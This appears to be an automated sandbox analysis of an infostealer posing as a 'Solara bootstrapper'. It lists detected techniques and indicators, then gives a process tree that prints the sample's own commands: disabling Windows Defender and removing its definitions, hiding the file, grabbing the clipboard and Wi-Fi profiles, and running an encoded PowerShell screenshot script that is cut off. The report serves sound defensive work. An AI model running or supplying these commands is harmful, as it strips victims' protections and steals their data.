825e43df561cd104d6c985bdcde6f18be5790f0e0657fd29413e3ca53cb6f4d4

Analysis

max time kernel
27s
max time network
28s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
14/04/2025, 16:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

solarabootstraper.exe
Size

7.8MB
MD5

4b5fbdbc403470858ad75164591e0aa4
SHA1

f50a3ca7b352c96faad8ded354f1c59bef294ec1
SHA256

825e43df561cd104d6c985bdcde6f18be5790f0e0657fd29413e3ca53cb6f4d4
SHA512

16bb3ccec46fdbe64227ac199c5c3f8d03c429b5640d8168ac8ac75ffb8d38d94f7a4b6d37eea23dc6d24669a23b87e7efc85753c846af3e6eac9132a3a8f039
SSDEEP

196608:QWD6HUOXXKAp5/hUzj9fZwQRCgiIKpdzjPOan7j2y283TOnO1:0xrhEw8wIKppDO9i1

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4680	powershell.exe
3388	powershell.exe
5320	powershell.exe
420	powershell.exe
2308	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1336	powershell.exe
5392	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
5252	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe
3124	solarabootstraper.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	discord.com
14	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
6028	tasklist.exe
1000	tasklist.exe
4448	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4496	cmd.exe

UPX packed file 43 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002b08f-21.dat	upx
behavioral1/memory/3124-25-0x00007FFC17B50000-0x00007FFC181B7000-memory.dmp	upx
behavioral1/files/0x001900000002b07d-27.dat	upx
behavioral1/files/0x001900000002b088-29.dat	upx
behavioral1/memory/3124-32-0x00007FFC2EC50000-0x00007FFC2EC5F000-memory.dmp	upx
behavioral1/files/0x001900000002b07e-42.dat	upx
behavioral1/files/0x001900000002b07f-43.dat	upx
behavioral1/files/0x001900000002b084-48.dat	upx
behavioral1/files/0x001900000002b083-47.dat	upx
behavioral1/files/0x001900000002b082-46.dat	upx
behavioral1/files/0x001900000002b081-45.dat	upx
behavioral1/files/0x001900000002b080-44.dat	upx
behavioral1/files/0x001900000002b094-40.dat	upx
behavioral1/files/0x001900000002b093-39.dat	upx
behavioral1/files/0x001900000002b092-38.dat	upx
behavioral1/files/0x001900000002b089-35.dat	upx
behavioral1/files/0x001900000002b087-34.dat	upx
behavioral1/files/0x001a00000002b07c-41.dat	upx
behavioral1/memory/3124-31-0x00007FFC2D9F0000-0x00007FFC2DA17000-memory.dmp	upx
behavioral1/memory/3124-50-0x00007FFC2EB30000-0x00007FFC2EB4A000-memory.dmp	upx
behavioral1/memory/3124-52-0x00007FFC2D870000-0x00007FFC2D89B000-memory.dmp	upx
behavioral1/memory/3124-58-0x00007FFC2C720000-0x00007FFC2C745000-memory.dmp	upx
behavioral1/memory/3124-60-0x00007FFC29640000-0x00007FFC297C9000-memory.dmp	upx
behavioral1/memory/3124-63-0x00007FFC2D850000-0x00007FFC2D869000-memory.dmp	upx
behavioral1/memory/3124-64-0x00007FFC2EC40000-0x00007FFC2EC4D000-memory.dmp	upx
behavioral1/memory/3124-70-0x00007FFC28DF0000-0x00007FFC28EBE000-memory.dmp	upx
behavioral1/memory/3124-69-0x00007FFC2C690000-0x00007FFC2C6C3000-memory.dmp	upx
behavioral1/memory/3124-71-0x00007FFC28EC0000-0x00007FFC293F3000-memory.dmp	upx
behavioral1/memory/3124-68-0x00007FFC17B50000-0x00007FFC181B7000-memory.dmp	upx
behavioral1/memory/3124-73-0x00007FFC2D9F0000-0x00007FFC2DA17000-memory.dmp	upx
behavioral1/memory/3124-74-0x00007FFC2C4F0000-0x00007FFC2C504000-memory.dmp	upx
behavioral1/memory/3124-79-0x00007FFC2C710000-0x00007FFC2C71D000-memory.dmp	upx
behavioral1/memory/3124-82-0x00007FFC28CE0000-0x00007FFC28D93000-memory.dmp	upx
behavioral1/memory/3124-81-0x00007FFC2EB30000-0x00007FFC2EB4A000-memory.dmp	upx
behavioral1/memory/3124-118-0x00007FFC2D870000-0x00007FFC2D89B000-memory.dmp	upx
behavioral1/memory/3124-120-0x00007FFC29640000-0x00007FFC297C9000-memory.dmp	upx
behavioral1/memory/3124-119-0x00007FFC2C720000-0x00007FFC2C745000-memory.dmp	upx
behavioral1/memory/3124-303-0x00007FFC28DF0000-0x00007FFC28EBE000-memory.dmp	upx
behavioral1/memory/3124-302-0x00007FFC2C690000-0x00007FFC2C6C3000-memory.dmp	upx
behavioral1/memory/3124-324-0x00007FFC28EC0000-0x00007FFC293F3000-memory.dmp	upx
behavioral1/memory/3124-368-0x00007FFC17B50000-0x00007FFC181B7000-memory.dmp	upx
behavioral1/memory/3124-374-0x00007FFC29640000-0x00007FFC297C9000-memory.dmp	upx
behavioral1/memory/3124-410-0x00007FFC17B50000-0x00007FFC181B7000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5148	cmd.exe
536	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6056	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3100	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133891231949574962"	chrome.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
420	powershell.exe
4680	powershell.exe
2308	powershell.exe
420	powershell.exe
4680	powershell.exe
2308	powershell.exe
1336	powershell.exe
1336	powershell.exe
1336	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3388	powershell.exe
3388	powershell.exe
5232	powershell.exe
5232	powershell.exe
1068	chrome.exe
1068	chrome.exe
5320	powershell.exe
5320	powershell.exe
5320	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	420	powershell.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	1000	tasklist.exe
Token: SeDebugPrivilege	6028	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3492	WMIC.exe
Token: SeSecurityPrivilege	3492	WMIC.exe
Token: SeTakeOwnershipPrivilege	3492	WMIC.exe
Token: SeLoadDriverPrivilege	3492	WMIC.exe
Token: SeSystemProfilePrivilege	3492	WMIC.exe
Token: SeSystemtimePrivilege	3492	WMIC.exe
Token: SeProfSingleProcessPrivilege	3492	WMIC.exe
Token: SeIncBasePriorityPrivilege	3492	WMIC.exe
Token: SeCreatePagefilePrivilege	3492	WMIC.exe
Token: SeBackupPrivilege	3492	WMIC.exe
Token: SeRestorePrivilege	3492	WMIC.exe
Token: SeShutdownPrivilege	3492	WMIC.exe
Token: SeDebugPrivilege	3492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3492	WMIC.exe
Token: SeRemoteShutdownPrivilege	3492	WMIC.exe
Token: SeUndockPrivilege	3492	WMIC.exe
Token: SeManageVolumePrivilege	3492	WMIC.exe
Token: 33	3492	WMIC.exe
Token: 34	3492	WMIC.exe
Token: 35	3492	WMIC.exe
Token: 36	3492	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3492	WMIC.exe
Token: SeSecurityPrivilege	3492	WMIC.exe
Token: SeTakeOwnershipPrivilege	3492	WMIC.exe
Token: SeLoadDriverPrivilege	3492	WMIC.exe
Token: SeSystemProfilePrivilege	3492	WMIC.exe
Token: SeSystemtimePrivilege	3492	WMIC.exe
Token: SeProfSingleProcessPrivilege	3492	WMIC.exe
Token: SeIncBasePriorityPrivilege	3492	WMIC.exe
Token: SeCreatePagefilePrivilege	3492	WMIC.exe
Token: SeBackupPrivilege	3492	WMIC.exe
Token: SeRestorePrivilege	3492	WMIC.exe
Token: SeShutdownPrivilege	3492	WMIC.exe
Token: SeDebugPrivilege	3492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3492	WMIC.exe
Token: SeRemoteShutdownPrivilege	3492	WMIC.exe
Token: SeUndockPrivilege	3492	WMIC.exe
Token: SeManageVolumePrivilege	3492	WMIC.exe
Token: 33	3492	WMIC.exe
Token: 34	3492	WMIC.exe
Token: 35	3492	WMIC.exe
Token: 36	3492	WMIC.exe
Token: SeDebugPrivilege	4448	tasklist.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeShutdownPrivilege	1068	chrome.exe
Token: SeCreatePagefilePrivilege	1068	chrome.exe
Token: SeIncreaseQuotaPrivilege	5224	WMIC.exe
Token: SeSecurityPrivilege	5224	WMIC.exe
Token: SeTakeOwnershipPrivilege	5224	WMIC.exe
Token: SeLoadDriverPrivilege	5224	WMIC.exe
Token: SeSystemProfilePrivilege	5224	WMIC.exe
Token: SeSystemtimePrivilege	5224	WMIC.exe
Token: SeProfSingleProcessPrivilege	5224	WMIC.exe
Token: SeIncBasePriorityPrivilege	5224	WMIC.exe
Token: SeCreatePagefilePrivilege	5224	WMIC.exe
Token: SeBackupPrivilege	5224	WMIC.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe
1068	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1240 wrote to memory of 3124	1240	solarabootstraper.exe	78
PID 1240 wrote to memory of 3124	1240	solarabootstraper.exe	78
PID 3124 wrote to memory of 1908	3124	solarabootstraper.exe	79
PID 3124 wrote to memory of 1908	3124	solarabootstraper.exe	79
PID 3124 wrote to memory of 240	3124	solarabootstraper.exe	80
PID 3124 wrote to memory of 240	3124	solarabootstraper.exe	80
PID 3124 wrote to memory of 5140	3124	solarabootstraper.exe	81
PID 3124 wrote to memory of 5140	3124	solarabootstraper.exe	81
PID 3124 wrote to memory of 4496	3124	solarabootstraper.exe	82
PID 3124 wrote to memory of 4496	3124	solarabootstraper.exe	82
PID 3124 wrote to memory of 5000	3124	solarabootstraper.exe	83
PID 3124 wrote to memory of 5000	3124	solarabootstraper.exe	83
PID 4496 wrote to memory of 5232	4496	cmd.exe	89
PID 4496 wrote to memory of 5232	4496	cmd.exe	89
PID 1908 wrote to memory of 420	1908	cmd.exe	91
PID 1908 wrote to memory of 420	1908	cmd.exe	91
PID 5140 wrote to memory of 4800	5140	cmd.exe	90
PID 5140 wrote to memory of 4800	5140	cmd.exe	90
PID 240 wrote to memory of 4680	240	cmd.exe	92
PID 240 wrote to memory of 4680	240	cmd.exe	92
PID 5000 wrote to memory of 2308	5000	cmd.exe	93
PID 5000 wrote to memory of 2308	5000	cmd.exe	93
PID 3124 wrote to memory of 3724	3124	solarabootstraper.exe	94
PID 3124 wrote to memory of 3724	3124	solarabootstraper.exe	94
PID 3124 wrote to memory of 4592	3124	solarabootstraper.exe	95
PID 3124 wrote to memory of 4592	3124	solarabootstraper.exe	95
PID 3124 wrote to memory of 4508	3124	solarabootstraper.exe	98
PID 3124 wrote to memory of 4508	3124	solarabootstraper.exe	98
PID 3124 wrote to memory of 5392	3124	solarabootstraper.exe	100
PID 3124 wrote to memory of 5392	3124	solarabootstraper.exe	100
PID 3124 wrote to memory of 1988	3124	solarabootstraper.exe	101
PID 3124 wrote to memory of 1988	3124	solarabootstraper.exe	101
PID 3124 wrote to memory of 2756	3124	solarabootstraper.exe	105
PID 3124 wrote to memory of 2756	3124	solarabootstraper.exe	105
PID 3724 wrote to memory of 1000	3724	cmd.exe	102
PID 3724 wrote to memory of 1000	3724	cmd.exe	102
PID 4592 wrote to memory of 6028	4592	cmd.exe	104
PID 4592 wrote to memory of 6028	4592	cmd.exe	104
PID 4508 wrote to memory of 3492	4508	cmd.exe	108
PID 4508 wrote to memory of 3492	4508	cmd.exe	108
PID 2756 wrote to memory of 3248	2756	cmd.exe	109
PID 2756 wrote to memory of 3248	2756	cmd.exe	109
PID 1988 wrote to memory of 4448	1988	cmd.exe	111
PID 1988 wrote to memory of 4448	1988	cmd.exe	111
PID 5392 wrote to memory of 1336	5392	cmd.exe	112
PID 5392 wrote to memory of 1336	5392	cmd.exe	112
PID 3124 wrote to memory of 3896	3124	solarabootstraper.exe	114
PID 3124 wrote to memory of 3896	3124	solarabootstraper.exe	114
PID 3124 wrote to memory of 5148	3124	solarabootstraper.exe	113
PID 3124 wrote to memory of 5148	3124	solarabootstraper.exe	113
PID 3124 wrote to memory of 5976	3124	solarabootstraper.exe	117
PID 3124 wrote to memory of 5976	3124	solarabootstraper.exe	117
PID 3124 wrote to memory of 3868	3124	solarabootstraper.exe	116
PID 3124 wrote to memory of 3868	3124	solarabootstraper.exe	116
PID 5148 wrote to memory of 536	5148	cmd.exe	121
PID 5148 wrote to memory of 536	5148	cmd.exe	121
PID 3868 wrote to memory of 5008	3868	cmd.exe	122
PID 3868 wrote to memory of 5008	3868	cmd.exe	122
PID 3896 wrote to memory of 3100	3896	cmd.exe	123
PID 3896 wrote to memory of 3100	3896	cmd.exe	123
PID 5976 wrote to memory of 3560	5976	cmd.exe	124
PID 5976 wrote to memory of 3560	5976	cmd.exe	124
PID 3124 wrote to memory of 6040	3124	solarabootstraper.exe	125
PID 3124 wrote to memory of 6040	3124	solarabootstraper.exe	125

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5232	attrib.exe

C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe
"C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe
  "C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:240
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('solara has stopped working', 0, 'disable antivirus and run', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5140
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('solara has stopped working', 0, 'disable antivirus and run', 0+16);close()"
      4⤵
      PID:4800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\solarabootstraper.exe"
      4⤵
      Views/modifies file attributes
      PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:5148
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQ